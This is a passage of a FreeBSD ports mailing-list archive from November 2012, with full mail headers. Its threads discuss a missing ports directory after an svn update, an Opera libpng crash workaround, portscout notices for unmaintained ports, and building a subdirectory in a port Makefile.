b=4F7qDamObeuRe8OzYlDmnb43wTRloRYp6vRxRRqjNm2tv/yYW88IlOZcDe1XM4d2ukNK/jhkqUjp9POvB43niySmkrz6GEe9zu/Nn1NWGJA4+n+/MJSt2E4fpgPclHZd3koc/12reUCoEVLaPiD2tEaA4cLz9/0Ayi39avAYnNQ=; X-YMail-OSG: YEDSLt4VM1mzdIONToMya2PAyCcD_bdv3N3GRJJp.9bWqQI Hkxw46RLG3rfVLPhfFIBFMzsW6gyRiWLfMOFdSbTJ_NLgu0d6m0X5JIQXAbg D9vu6ph1lFePc.08p4zQyyc8InuiX49gvk8PwoR_V_EvrEp84h.N8l4Il1Jm alceGW7BfVy07SiCX.kdu8AobYgwiiorvviAaY.y_.g3pBXEJ8sb_0bYMYpu w1TFRcAJc5ybkEytPGJbdktLojVqAEcqzcBiF1lPDMP0ITL7i0b6NhpdwW1i d4CcBkc.4.owYLqts2dO3amNQ9pjKNV9ayRBeG.cvlXUaPRe.46Vw15oRDWj BxMwjJn6yNAg69H6MixGUYcC34m_3YkiZnWX1QHBDvQY9RGlwrW.hZC2NHeW oX7Zysvu63P8zrXaj6.0Ie45x0LLe5ZCw0C0iCrD.g3BRVStAsNYn6EcCqJ. iW3Lsg0BxzrQhWU4VKuuNaJdyAK_bFyFqYDkiFGRbmRbsrGl5l6RzQA-- Received: from [66.92.43.99] by web164003.mail.gq1.yahoo.com via HTTP; Wed, 28 Nov 2012 20:20:41 PST X-Rocket-MIMEInfo: 001.001, QXMgaW4gdGhlIHN1YmplY3QuwqAgQW55b25lIGVsc2U_DQpyIDMwNzk1Mw0KDQpKLiBCb3VxdWV0DQoBMAEBAQE- X-Mailer: YahooMailClassic/15.0.8 YahooMailWebService/0.8.127.475 Message-ID: <1354162841.71564.YahooMailClassic@web164003.mail.gq1.yahoo.com> Date: Wed, 28 Nov 2012 20:20:41 -0800 (PST) From: Jeffrey Bouquet Subject: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 04:22:41 -0000 As in the subject.=A0 Anyone else? r 307953 J. Bouquet From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 04:28:53 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id C5369312 for ; Thu, 29 Nov 2012 04:28:53 +0000 (UTC) (envelope-from jeffreybouquet@yahoo.com) Received: from nm18-vm7.bullet.mail.gq1.yahoo.com (nm18-vm7.bullet.mail.gq1.yahoo.com [98.136.217.222]) by mx1.freebsd.org (Postfix) with ESMTP id 7BEE58FC08 for ; Thu, 29 Nov 2012 04:28:52 +0000 (UTC) Received: from [98.137.12.62] by nm18.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 04:28:52 -0000 Received: from [98.137.12.236] by tm7.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 04:28:52 -0000 Received: from [127.0.0.1] by omp1044.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 04:28:52 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 70470.90491.bm@omp1044.mail.gq1.yahoo.com Received: (qmail 20911 invoked by uid 60001); 29 Nov 2012 04:28:52 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1354163332; bh=G8owujSU86Ahnw46ipbaMJ5e8knouRPLiMiqYuRzR4E=; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=woAGoDUoNcJLJwl9fz3rV0I4BGmvcC99qRLRq2NLshZTLNK/aqnkoqI6tZUKwpiFsV4BfyDlZ7qOYMQICxDVjFDH4nlXCN4dmpnJjapbsjNEbuNfR5wdTtEdCv+9ds1G8nynCYytnXr8RrNOLQz9/Ki4KcpJJc39fVSIqeCR/tI= DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=x+uYv5FwxyHS+ZBLXEn8hTXXPMECCQdEdw7D7vRQq/RvgHLI1lIpbU40qg0KGLNgrovzxTVL5MfxSwHKKkXa56it26jB0iCh6m2rfeNcgu0AmQqumasMnQFc9SESjpy+y1cxNFHodo9fn17gw7fq/YVgYJ0miyOAUZTbI5Oo5sI=; X-YMail-OSG: Med9Z2MVM1mKAa2lTlXPO3WV9PUtIJPeEykXjB0EzQ1WZ0J jyQxy0kt90Jz.0Y689Yb6UsuHCwppbnRH7UNf771OyALOjC3EK0AHTxHk3hl VxhZoE9yNNt9VZU9wVpvFNXXIcm_Mwpbt6rLxNmpAv1CUJeJmtTI4Y2SLqHc ndfwmI5qvqVU37upACS_gHRi1Ix0sx7wQ4.H0vCNaZVic_OJGyI77RRIUbgd 9YXdEqcQA1FPlvaSOAe4WduREIG1Yfu.d_dcn3A6zRVnbqEY6gMgoh5llnNd _l9BCrgIwPl1tpsJhwkyIaulyw.uIUd2y63EQ0u.jkpkRUIhDcOUETeciuMS QMM4fmnqd1n08nLDlXDqVQwnbMR.6NKuK8q0lH1LZY7Pt25FppRYrhvtDHpv ryddvVbj3q1ppJW3L7tdKvD3sJf7owFa6a103lJ0ET0psaxX.pIvyqMBpHUP JCF2VEDZ.LdLqr_3TvikyrujYTOHu6xqJJpVXsVFi7GUOjCEwc2dOoUR56ST KXHWj Received: from [66.92.43.99] by web164001.mail.gq1.yahoo.com via HTTP; Wed, 28 Nov 2012 20:28:51 PST X-Rocket-MIMEInfo: 001.001, DQoNCi0tLSBPbiBXZWQsIDExLzI4LzEyLCBKZWZmcmV5IEJvdXF1ZXQgPGplZmZyZXlib3VxdWV0QHlhaG9vLmNvbT4gd3JvdGU6DQoNCkZyb206IEplZmZyZXkgQm91cXVldCA8amVmZnJleWJvdXF1ZXRAeWFob28uY29tPg0KU3ViamVjdDogL2FyY2hpdmVycy8gaXMgbWlzc2luZyBhZnRlciBzdm4uLi4NClRvOiBmcmVlYnNkLXBvcnRzQGZyZWVic2Qub3JnDQpEYXRlOiBXZWRuZXNkYXksIE5vdmVtYmVyIDI4LCAyMDEyLCA4OjIwIFBNDQoNCkFzIGluIHRoZSBzdWJqZWN0LsKgIEFueW9uZSBlbHNlPw0KciABMAEBAQE- X-Mailer: YahooMailClassic/15.0.8 YahooMailWebService/0.8.127.475 Message-ID: <1354163331.95052.YahooMailClassic@web164001.mail.gq1.yahoo.com> Date: Wed, 28 Nov 2012 20:28:51 -0800 (PST) From: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org In-Reply-To: <1354162841.71564.YahooMailClassic@web164003.mail.gq1.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 04:28:53 -0000 --- On Wed, 11/28/12, Jeffrey Bouquet wrote: From: Jeffrey Bouquet Subject: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org Date: Wednesday, November 28, 2012, 8:20 PM As in the subject.=A0 Anyone else? r 307953 UPDATE:=20 OTOH I can svn it independently to elsewhere than ports, any canonical way to move that /tmp/archivers to /usr/ports/archivers ??=20 J. Bouquet From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 08:38:28 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 1F4AE19E for ; Thu, 29 Nov 2012 08:38:28 +0000 (UTC) (envelope-from ronald-freebsd8@klop.yi.org) Received: from smarthost1.greenhost.nl (smarthost1.greenhost.nl [195.190.28.78]) by mx1.freebsd.org (Postfix) with ESMTP id B3A088FC08 for ; Thu, 29 Nov 2012 08:38:27 +0000 (UTC) Received: from smtp.greenhost.nl ([213.108.104.138]) by smarthost1.greenhost.nl with esmtps (TLS1.0:RSA_AES_256_CBC_SHA1:32) (Exim 4.69) (envelope-from ) id 1TdzdZ-0006Rk-6x for freebsd-ports@freebsd.org; Thu, 29 Nov 2012 09:38:25 +0100 Received: from [81.21.138.17] (helo=ronaldradial.versatec.local) by smtp.greenhost.nl with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32) (Exim 4.72) (envelope-from ) id 1TdzdY-0002W1-Un for freebsd-ports@freebsd.org; Thu, 29 Nov 2012 09:38:24 +0100 Content-Type: text/plain; charset=us-ascii; format=flowed; delsp=yes To: freebsd-ports@freebsd.org Subject: Re: opera 12.11 libpng error References: <20121128235744.436a679f@it.tim.tetcu.info> <201211281721.33934.lumiwa@gmail.com> Date: Thu, 29 Nov 2012 09:38:26 +0100 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit From: "Ronald Klop" Message-ID: In-Reply-To: <201211281721.33934.lumiwa@gmail.com> User-Agent: Opera Mail/12.11 (Win32) X-Virus-Scanned: by clamav at smarthost1.samage.net X-Spam-Level: / X-Spam-Score: 0.8 X-Spam-Status: No, score=0.8 required=5.0 tests=BAYES_50 autolearn=disabled version=3.3.1 X-Scan-Signature: 76f3589a93270604ea078d468a2051b3 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 08:38:28 -0000 On Thu, 29 Nov 2012 00:21:33 +0100, ajtiM wrote: > On Wednesday 28 November 2012 15:57:44 Ion-Mihai Tetcu wrote: >> On Wed, 28 Nov 2012 21:28:30 +0100 >> >> "Ronald Klop" wrote: >> > Hi, >> > >> > I have the same libpng error when starting Opera 12.11 as already >> > mentioned on this list. I happen to run KDE and ktrace shows me it >> > crashes while reading icons like >> > /usr/local/kde4/share/icons/oxygen/64x64/mimetypes/unknown.png. >> > After renaming these icons so Opera does not find them it still >> > prints 'libpng error: incorrect data check' but does not crash >> > anymore. If I start without KDE integration there is no error anymore. >> > You can do this by adding Dialog Toolkit=4 to the [File Selector] >> > part of your opera*.ini. >> > http://de.opera.com/support/usingopera/operaini/#file_selector >> > >> > Not an ideal solution, but at least I can read my e-mail again in >> > Opera. >> >> I've added a note in UPDATING for this, thank you! > > Thank you very much for help... > It works now but Opera is not as before. It crashed on many sites (also > at > work on my Mac), I cannot upload pictures on Redbubble (Xombrero or > Konqueror > are much better). I hope Opera 12.12 would be better.... > > Thank you to everyone for the help again... > > Mitja Please report a bug at opera.com about this. https://bugs.opera.com/wizarddesktop/ Ronald. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 08:49:06 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 3E394427 for ; Thu, 29 Nov 2012 08:49:06 +0000 (UTC) (envelope-from ronald-freebsd8@klop.yi.org) Received: from smarthost1.greenhost.nl (smarthost1.greenhost.nl [195.190.28.78]) by mx1.freebsd.org (Postfix) with ESMTP id E29D78FC16 for ; Thu, 29 Nov 2012 08:49:04 +0000 (UTC) Received: from smtp.greenhost.nl ([213.108.104.138]) by smarthost1.greenhost.nl with esmtps (TLS1.0:RSA_AES_256_CBC_SHA1:32) (Exim 4.69) (envelope-from ) id 1Tdznr-00072X-7v for freebsd-ports@freebsd.org; Thu, 29 Nov 2012 09:49:03 +0100 Received: from [81.21.138.17] (helo=ronaldradial.versatec.local) by smtp.greenhost.nl with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32) (Exim 4.72) (envelope-from ) id 1Tdznq-0002xb-5F for freebsd-ports@freebsd.org; Thu, 29 Nov 2012 09:49:02 +0100 Content-Type: text/plain; charset=utf-8; format=flowed; delsp=yes To: freebsd-ports@freebsd.org Subject: Re: /archivers/ is missing after svn... References: <1354163331.95052.YahooMailClassic@web164001.mail.gq1.yahoo.com> Date: Thu, 29 Nov 2012 09:49:03 +0100 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit From: "Ronald Klop" Message-ID: In-Reply-To: <1354163331.95052.YahooMailClassic@web164001.mail.gq1.yahoo.com> User-Agent: Opera Mail/12.11 (Win32) X-Virus-Scanned: by clamav at smarthost1.samage.net X-Spam-Level: / X-Spam-Score: -0.0 X-Spam-Status: No, score=-0.0 required=5.0 tests=BAYES_40 autolearn=disabled version=3.3.1 X-Scan-Signature: 4052b6d1c9976086d5ab5ce040fcf5b8 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 08:49:06 -0000 On Thu, 29 Nov 2012 05:28:51 +0100, Jeffrey Bouquet wrote: > > > --- On Wed, 11/28/12, Jeffrey Bouquet wrote: > > From: Jeffrey Bouquet > Subject: /archivers/ is missing after svn... > To: freebsd-ports@freebsd.org > Date: Wednesday, November 28, 2012, 8:20 PM > > As in the subject. Anyone else? > r 307953 > > UPDATE: > > OTOH I can svn it independently to elsewhere than ports, any canonical > way > to move that /tmp/archivers to /usr/ports/archivers ?? > > J. Bouquet File permissions of /usr/ports? Or /usr/ports/archivers? Any error messages while doing what you are doing? Ronald. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 09:33:45 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 3ED62FE2 for ; Thu, 29 Nov 2012 09:33:45 +0000 (UTC) (envelope-from roam@ringlet.net) Received: from nimbus.fccf.net (nimbus.fccf.net [77.77.144.35]) by mx1.freebsd.org (Postfix) with ESMTP id CD7538FC17 for ; Thu, 29 Nov 2012 09:33:44 +0000 (UTC) Received: from straylight.m.ringlet.net (unknown [78.90.13.150]) by nimbus.fccf.net (Postfix) with ESMTPSA id 00856ACF for ; Thu, 29 Nov 2012 11:24:33 +0200 (EET) Received: from roam (uid 1000) (envelope-from roam@ringlet.net) id 50e0b1 by straylight.m.ringlet.net (DragonFly Mail Agent); Thu, 29 Nov 2012 11:24:33 +0200 Date: Thu, 29 Nov 2012 11:24:33 +0200 From: Peter Pentchev To: Alexander Yerenkow Subject: Re: FreeBSD ports you maintain which are out of date Message-ID: <20121129092433.GA5519@straylight.m.ringlet.net> Mail-Followup-To: Alexander Yerenkow , Kevin Oberman , ports@freebsd.org, Paul Schmehl , portscout@portscout.zi0r.com, Shane Ambler , Radim Kolar References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B56392.9060506@ShaneWare.Biz> <31BBFCB108C82225ADF20511@utd71538.campus.ad.utdallas.edu> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="FCuugMFkClbJLl1L" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.21 (2010-09-15) Cc: portscout@portscout.zi0r.com, Radim Kolar , Paul Schmehl , Kevin Oberman , ports@freebsd.org, Shane Ambler X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 09:33:45 -0000 --FCuugMFkClbJLl1L Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 28, 2012 at 09:06:59PM +0200, Alexander Yerenkow wrote: > 2012/11/28 Kevin Oberman >=20 > > On Wed, Nov 28, 2012 at 7:45 AM, Alexander Yerenkow > > wrote: > > > In that case, near each port should be.mntr contact mentioned, to.mak= e it > > > easier for anyone to contact mntr immediately, instead making additio= nal > > > unnecessary steps. > > > > I suspect that you are missing the fact that all ports which lack a > > specific maintainer (most of them) are maintained by ports@. So the > > messages to ports are only for the vast array of ports that are > > unmaintained. There is no one else to contact. > > > > Ideally, if someone has a little free time, they can look at the list > > and pick a couple to update and submit the update in a PR to ports > > with a category of "update". Or even better, become the maintainer, > > yourself. I have been maintainer for a couple of ports that were > > critical to my work, so I could be sure that they would be updated > > promptly. > > >=20 > Not exactly :) My suggestion about including current maintainer contact > info was about this part of discussion: >=20 > >>Probably more to the point is that it shouldn't get sent to the ports > >>mailing list - just to port maintainers. > >Did you ever think that sending it to the list might motivate someone el= se > to take over the port? > >There's a reason ports get out of date. One of the reasons is because the > port maintainer has lost interest or no longer has the time. If people on > the list see it, someone who is motivated might update the >port and end = up > being its new maintainer. >=20 > So, my thought was, if you ever came to sending portscout messages with > alive maintainer to all ports@ list, would be nice to see contacts > immediately. > You could learn that some maintainer is inactive last time, and next time > you see update for his port, you could get it to work. > Something like that. But this is exactly the point - portscout *only* sends messages to the e-mail address listed in the port's MAINTAINER line. If portscout's message goes to the ports@FreeBSD.org list, then there *is* no active maintainer - what Paul means is that the maintainer has lost interest (or the ability / resources / time to work on the port) and somebody has reset the port's maintainership to ports@FreeBSD.org. G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org peter@packetscale.com PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint 2EE7 A7A5 17FC 124C F115 C354 651E EFB0 2527 DF13 If I had finished this sentence, --FCuugMFkClbJLl1L Content-Type: application/pgp-signature; name="signature.asc" Content-Description: Digital signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCAAGBQJQtynMAAoJEGUe77AlJ98T4mYP/1jZbE4vZJebY/Jc/n/rlxPi /zH7JbfUzfulpi3aw6jBsx/qDTxLO4AqrvAOmZLy0EVrJl9xxcPcLMeprFLltB3o FNuWpR68H5z2J3peue7V0UBJTOB0lISUrUbpWi0+gFWvqk8Q6hPIyqaJeB2w+kZR FMYLkZQD4OpVOkxCLOBBkcJ8R6Vxd522kGeg+QZHm0K8L+mmtPQFhg1Q06VKGU+c WpE3mgPQeK0aIexOmPxUNg4R3Yfs9Xlabuq3T7TIy/NzUEYRpxV1RiyTnziUKKwW gcKDi2AHlQlKFogZ7OtlcP2y03Kgfn71p6R7qrzYRwPfoE8uBEtOc7oSQRGzy+8W Z2vunBYwE/mcmC31yTZUNNmuSGfUyqK+383TfaRD734HT2/d7BuBMUdOr8iS2LBc 5IKTJnDUrsRl0OXnfeSQoyRgMhDtjkKzfHMYKWUbh4YxV+39bXVJ189wTjALW73R TFDYDWZD6KyklUIZvz/Hgrh4H6LqsqxDgmEeib4ZTWM3pjazSwQOs6bQcHyMWYZk VD1x9ZEjeSZqJ0Rg3qR/oW+mnHwt8G0hV6wiCYPO34nXgS6Q8YoU2P+wqwlmMRvK avHLcCYy5ekIw5eYEQxFeK7WTNrNt1P09ay6VDOOgIRM1m4dQKFmeJ6B2ks/1ei0 qcQicp8Et4rlG/4peYMH =Ksoa -----END PGP SIGNATURE----- --FCuugMFkClbJLl1L-- From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 09:43:49 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 49A98367 for ; Thu, 29 Nov 2012 09:43:49 +0000 (UTC) (envelope-from roam@ringlet.net) Received: from nimbus.fccf.net (nimbus.fccf.net [77.77.144.35]) by mx1.freebsd.org (Postfix) with ESMTP id B7EC28FC08 for ; Thu, 29 Nov 2012 09:43:48 +0000 (UTC) Received: from straylight.m.ringlet.net (unknown [78.90.13.150]) by nimbus.fccf.net (Postfix) with ESMTPSA id 9D5C98D1 for ; Thu, 29 Nov 2012 11:43:47 +0200 (EET) Received: from roam (uid 1000) (envelope-from roam@ringlet.net) id b0e024 by straylight.m.ringlet.net (DragonFly Mail Agent); Thu, 29 Nov 2012 11:43:47 +0200 Date: Thu, 29 Nov 2012 11:43:47 +0200 From: Peter Pentchev To: Paul Schmehl Subject: Re: How to descend into the extract to build in a subdir Message-ID: <20121129094347.GB5519@straylight.m.ringlet.net> Mail-Followup-To: Paul Schmehl , FreeBSD Ports List References: <4B522159C9F77F81D968E64D@utd71538.campus.ad.utdallas.edu> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="7iMSBzlTiPOCCT2k" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.21 (2010-09-15) Cc: FreeBSD Ports List X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 09:43:49 -0000 --7iMSBzlTiPOCCT2k Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Nov 27, 2012 at 02:45:54PM -0600, Paul Schmehl wrote: > --On November 27, 2012 2:24:12 PM -0600 Paul Schmehl > wrote: >=20 > >I'm working on a port that requires a separate ./configure and ./make to > >build libraries before you build the main source. How is this done in > >ports? > > > >I figure you have to do something in pre-build:, but I'm not sure exactly > >what. > >(cd ${WRKSRC}/subdir && ${MAKE}) causes make to fail entirely. I'm > >having trouble finding a comparable example in ports and there doesn't > >seem to be anything about it in the porters handbook (that I have found.) >=20 > Never mind. I figured it outl >=20 > .if ${PORT_OPTIONS:MBROCCOLI} > pre-configure: > (cd ${WRKSRC}/aux/broccoli && ./configure) > pre-build: > (cd ${WRKSRC}/aux/broccoli && ${MAKE}) > .endif I know I'm a bit late to this party, but still - if this is a GNU configure script, you might want to pass a couple more options to it. Take a look at how bsd.port.mk (around line 3735) does it - it basically runs ${SETENV} ... ${CONFIGURE_ENV} ./${CONFIGURE_SCRIPT} ${CONFIGURE_ARGS} with a couple more environment variables defined (compiler, linker, paths, etc). If your port does not do at least something similar to this, it might end up compiling different parts of the source with different settings (e.g. CC, CFLAGS, CPPFLAGS for -D... and -I... and so on). And the same goes for the ${MAKE} invocation - take a look at the do-build target in bsd.port.mk (just a couple of lines below the configure one) - at least ${SETENV} ${MAKE_ENV} ${MAKE}, if not a couple more MAKE_FLAGS and MAKE_ARGS, maybe MAKE_JOBS for parallel building. G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org p.penchev@storpool.com PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint 2EE7 A7A5 17FC 124C F115 C354 651E EFB0 2527 DF13 What would this sentence be like if pi were 3? --7iMSBzlTiPOCCT2k Content-Type: application/pgp-signature; name="signature.asc" Content-Description: Digital signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCAAGBQJQty5OAAoJEGUe77AlJ98TSV8P/jHsZDXTmyfKBYKgK8en4nYu kMjfFEjC0J22FQu5vu9zxdsY/aDb5FABEsz4HCJKv2DXsCflIjnvonJamJj5fygO XFGeBWoTgXRv9n4N6S5aJ9z216UPyOkWSHtAHnwYLsr7xT64lu6ukRDv6fP0pim/ 9xYl4IxvrwXgbPSiVg2WiALnRbobHmnhnDkwtiqID0SSHpsLbwVmks2xrQTLg52X /NMNuTAM/fpN6KgWxS+kCfx0STVbdWhhy6GqkIuOGx9T5FeK408vNSDoM6tmgsFC CfZlSEcPD9ZfNuvhUaUPFfPWxowr+1Fq8U2yd+cfFRiBx/R17DLPeYS+esCnj/zE 2S2Fu4NsYZR5iWHNgeAS+GNZ0cgPA4KdCv+5yYUOoBuhVyLRE0H0bdH8OWA9KDkF PAeP8j88D7FT4bge6yrmqH2/1bip91cGdduyeKknPnIRxumSkJ+aRHVUWXCljGu4 KHUtbjw1WK9/Yfww/osBcJYZqUNCIqQKp0xaIvrz5XSc70EJzOpt2Q0W3mUx3YBM WEH1xXOt1VvllOoEvEcb4HhddO0t8A80zq62gT1UoHUgPJOgp+zX4co91t6hkCMx zecBk/WOvcZkj+t4js7QAkX3dw4Y+Xli7B3pSKbnEvc18uyBFtaBHqIPlGwkBD/z BftF3xmaYlWrWq8qvdFO =rO3v -----END PGP SIGNATURE----- --7iMSBzlTiPOCCT2k-- From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 10:10:38 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 2A9ECBAF for ; Thu, 29 Nov 2012 10:10:38 +0000 (UTC) (envelope-from yerenkow@gmail.com) Received: from mail-ob0-f182.google.com (mail-ob0-f182.google.com [209.85.214.182]) by mx1.freebsd.org (Postfix) with ESMTP id D07E88FC0C for ; Thu, 29 Nov 2012 10:10:36 +0000 (UTC) Received: by mail-ob0-f182.google.com with SMTP id 16so16547919obc.13 for ; Thu, 29 Nov 2012 02:10:36 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; bh=LW2h1mr4S2l6+aA8dGp9XW1GCr38yypsdPi7nFTVR24=; b=R6hq9GI300NdvmA4caWCEFyjlFlv+k5s1sG5GqsuC23W+cCrvA2FqxD72QFKZ0oOnr Q5F1FtPgSbiDScBX2g3sVqW+SmeynCuLJ1XXes11VucdcwdqsL82rgKW+LHJJV+6MQJe w6SAaRsVVbC122CXhC0sNcxqmKoWnZot3ZZDF0CllWV4tFvXzz93a64NUtPCPPglff8e G8S4u8OSEL6R4vTPuYCUBog3LsC/4cyELEj8ol0uS/tUcYQp6e6onPiyADyZl1Pk5Wk2 6q0U/8ztDT9v7xcPvXsZ2jftCL7EwNu9kNLLTSyPYVvvxhJ1fs3J/lAwxFuCXxibAk/y sDTQ== MIME-Version: 1.0 Received: by 10.60.31.241 with SMTP id d17mr1118824oei.107.1354183836130; Thu, 29 Nov 2012 02:10:36 -0800 (PST) Received: by 10.60.170.167 with HTTP; Thu, 29 Nov 2012 02:10:36 -0800 (PST) In-Reply-To: <20121129092433.GA5519@straylight.m.ringlet.net> References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B56392.9060506@ShaneWare.Biz> <31BBFCB108C82225ADF20511@utd71538.campus.ad.utdallas.edu> <20121129092433.GA5519@straylight.m.ringlet.net> Date: Thu, 29 Nov 2012 12:10:36 +0200 Message-ID: Subject: Re: FreeBSD ports you maintain which are out of date From: Alexander Yerenkow To: Alexander Yerenkow , Kevin Oberman , ports@freebsd.org, Paul Schmehl , Shane Ambler , Radim Kolar Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 10:10:38 -0000 2012/11/29 Peter Pentchev > On Wed, Nov 28, 2012 at 09:06:59PM +0200, Alexander Yerenkow wrote: > > 2012/11/28 Kevin Oberman > > > > > On Wed, Nov 28, 2012 at 7:45 AM, Alexander Yerenkow < > yerenkow@gmail.com> > > > wrote: > > > > In that case, near each port should be.mntr contact mentioned, > to.make it > > > > easier for anyone to contact mntr immediately, instead making > additional > > > > unnecessary steps. > > > > > > I suspect that you are missing the fact that all ports which lack a > > > specific maintainer (most of them) are maintained by ports@. So the > > > messages to ports are only for the vast array of ports that are > > > unmaintained. There is no one else to contact. > > > > > > Ideally, if someone has a little free time, they can look at the list > > > and pick a couple to update and submit the update in a PR to ports > > > with a category of "update". Or even better, become the maintainer, > > > yourself. I have been maintainer for a couple of ports that were > > > critical to my work, so I could be sure that they would be updated > > > promptly. > > > > > > > Not exactly :) My suggestion about including current maintainer contact > > info was about this part of discussion: > > > > >>Probably more to the point is that it shouldn't get sent to the ports > > >>mailing list - just to port maintainers. > > >Did you ever think that sending it to the list might motivate someone > else > > to take over the port? > > >There's a reason ports get out of date. One of the reasons is because > the > > port maintainer has lost interest or no longer has the time. If people on > > the list see it, someone who is motivated might update the >port and end > up > > being its new maintainer. > > > > So, my thought was, if you ever came to sending portscout messages with > > alive maintainer to all ports@ list, would be nice to see contacts > > immediately. > > You could learn that some maintainer is inactive last time, and next time > > you see update for his port, you could get it to work. > > Something like that. > > But this is exactly the point - portscout *only* sends messages to the > e-mail address listed in the port's MAINTAINER line. If portscout's > message goes to the ports@FreeBSD.org list, then there *is* no active > maintainer - what Paul means is that the maintainer has lost interest > (or the ability / resources / time to work on the port) and somebody has > reset the port's maintainership to ports@FreeBSD.org. > Between " maintainer has lost interest" and "somebody has reset the port's maintainership" sometimes months happens, if not years. With some digests (even monthly ones) someone other could see that there is new version of X, and look at portstree, and if it's not there - he could poke maintainer. That was my point. OT: Would be good if ports infrastructure eventually evolve in some collaborative way, with seeing other's activity, actions, 